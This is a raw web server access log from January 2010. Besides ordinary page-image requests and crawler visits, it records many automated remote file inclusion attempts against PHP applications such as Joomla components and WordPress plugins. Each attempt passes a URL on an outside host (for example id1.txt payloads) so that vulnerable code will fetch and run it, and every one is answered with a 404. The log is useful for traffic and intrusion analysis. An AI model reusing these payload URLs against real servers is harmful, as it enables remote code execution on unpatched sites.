173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:26 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:27 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):62219_________________________" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:28 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
173.25.3.15 - - [05/Jan/2010:03:30:28 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)"
81.12.13.152 - - [05/Jan/2010:03:31:06 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:31:06 -0500] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:31:06 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:31:06 -0500] "GET /logs/access_log.Q109060100//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:31:46 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:31:46 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:31:46 -0500] "GET /logs/error_log.Q109073000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:32:07 -0500] "GET /logs/access_log.Q109073000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:32:13 -0500] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:32:13 -0500] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:32:13 -0500] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:32:16 -0500] "GET /logs/access_log.Q109110600//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:32:16 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:32:16 -0500] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:32:16 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
81.12.13.152 - - [05/Jan/2010:03:32:17 -0500] "GET /logs/error_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://dsteel.co.kr/bbs/pirates/zfxid.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
66.249.65.7 - - [05/Jan/2010:03:32:19 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS HTTP/1.1" 200 45922 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.160.17.200 - - [05/Jan/2010:03:32:33 -0500] "GET /logs/error_log.Q109080700%20%20///products.php?prod=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:32:46 -0500] "GET //delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:32:46 -0500] "GET /logs/access_log.Q109061300//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:32:48 -0500] "GET /logs//delete_all.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:32:57 -0500] "GET /logs/access_log.Q109080200%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:04 -0500] "GET /logs//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:05 -0500] "GET /logs/access_log.Q109080200%20%20//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:09 -0500] "GET //components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:33:12 -0500] "GET /logs/error_log.Q109073000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:33:13 -0500] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:33:13 -0500] "GET /logs/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:19 -0500] "GET /logs/error_log.Q109080200%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:30 -0500] "GET /logs/access_log.Q109121600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.19.194.26 - - [05/Jan/2010:03:33:34 -0500] "GET /logs/access_log.Q109073000%20%20/components/com_joomlalib/standalone/stubjambo.php?baseDir=http://nextime.t35.com/Oid1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:47 -0500] "GET /logs/error_log.Q109121600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:49 -0500] "GET /logs/error_log.Q109072000%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:33:49 -0500] "GET /logs/access_log.Q109120100//classes/adodbt/sql.php?classes_dir=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:03 -0500] "GET /logs/error_log.Q109102600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:12 -0500] "GET /logs/access_log.Q109121000%20%20//components/errors.php?error=http://www.luckstone.kr//ams/amzone/ammember/user_session/img00.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:14 -0500] "GET /logs/access_log.Q109072000%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:20 -0500] "GET /logs/access_log.Q109080600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:22 -0500] "GET /logs/error_log.Q109080600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:25 -0500] "GET /logs/access_log.Q109070200%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
95.108.128.242 - - [05/Jan/2010:03:34:29 -0500] "GET /logs/error_log.Q109081400 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
200.93.147.154 - - [05/Jan/2010:03:34:42 -0500] "GET /logs/error_log.Q109071400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:46 -0500] "GET /logs/access_log.Q109092900%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:34:46 -0500] "GET /logs/access_log.Q109121000%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:34:57 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:34:57 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:34:57 -0500] "GET /logs/access_log.Q109110600%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:34:57 -0500] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
123.125.66.86 - - [05/Jan/2010:03:35:03 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.93.147.154 - - [05/Jan/2010:03:35:03 -0500] "GET /logs/error_log.Q109121000%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:35:15 -0500] "GET /logs/error_log.Q109092900%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
83.170.89.6 - - [05/Jan/2010:03:35:15 -0500] "GET /logs/access_log.Q109063000%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:35:16 -0500] "GET /logs/access_log.Q109071400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
83.170.89.6 - - [05/Jan/2010:03:35:20 -0500] "GET /logs/access_log.Q109120700%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:35:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.93.147.154 - - [05/Jan/2010:03:36:21 -0500] "GET /logs/access_log.Q109091300%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:36:37 -0500] "GET /logs/access_log.Q109080100%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.181.7.62 - - [05/Jan/2010:03:36:48 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.93.147.154 - - [05/Jan/2010:03:36:50 -0500] "GET /logs/error_log.Q109062000%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:36:50 -0500] "GET /logs/access_log.Q109102600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:05 -0500] "GET /logs/error_log.Q109052600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:06 -0500] "GET /logs/error_log.Q109101900%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:22 -0500] "GET /logs/access_log.Q109091700%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:39 -0500] "GET /logs/error_log.Q109061500%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:39 -0500] "GET /logs/access_log.Q109052400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:40 -0500] "GET /logs/error_log.Q109091300%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:37:46 -0500] "GET /logs/error_log.Q109080100%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:38:04 -0500] "GET /logs/access_log.Q109061500%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:38:20 -0500] "GET /logs/access_log.Q109051400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:38:20 -0500] "GET /logs/access_log.Q109110700%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:38:39 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:38:39 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
115.68.3.94 - - [05/Jan/2010:03:38:39 -0500] "GET /logs/access_log.Q109110200//bbs//skin/zero_vote/ask_password.php?dir=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:39:20 -0500] "GET /logs/access_log.Q109062700%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:39:42 -0500] "GET /logs/access_log.Q109052500%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.195.114.54 - - [05/Jan/2010:03:39:52 -0500] "GET /logs/error_log.Q109110900 HTTP/1.0" 200 3918081 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [05/Jan/2010:03:40:02 -0500] "GET /logs/error_log.Q109120600%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:40:03 -0500] "GET /logs/access_log.Q109080100%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.22.197.240 - - [05/Jan/2010:03:40:05 -0500] "GET /logs/access_log.Q109072400%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:40:05 -0500] "GET /logs/error_log.Q109091700%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [05/Jan/2010:03:40:33 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.114.54 - - [05/Jan/2010:03:39:53 -0500] "GET /logs/error_log.Q109110900 HTTP/1.0" 200 3918081 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
89.184.72.4 - - [05/Jan/2010:03:40:46 -0500] "GET /logs//admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
89.184.72.4 - - [05/Jan/2010:03:40:46 -0500] "GET //admin.remository.php?mosConfig_absolute_path=http://puri.80port.net/bbs/icon/id1.txt? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:40:49 -0500] "GET /logs/error_log.Q109052500%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:40:54 -0500] "GET /logs/error_log.Q109052400%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:03:41:05 -0500] "GET /logs/access_log.Q109080700///products.php?prod=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:03:41:25 -0500] "GET /logs/access_log.Q109080700///products.php?prod=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
81.2.201.96 - - [05/Jan/2010:03:41:29 -0500] "GET /logs/error_log.Q109080700///products.php?prod=http://instantprofit.ru//images/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
200.93.147.154 - - [05/Jan/2010:03:41:43 -0500] "GET /logs/error_log.Q109090500%20%20//components/errors.php?error=http://www.johngarzon.com.co/list/id1.txt? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
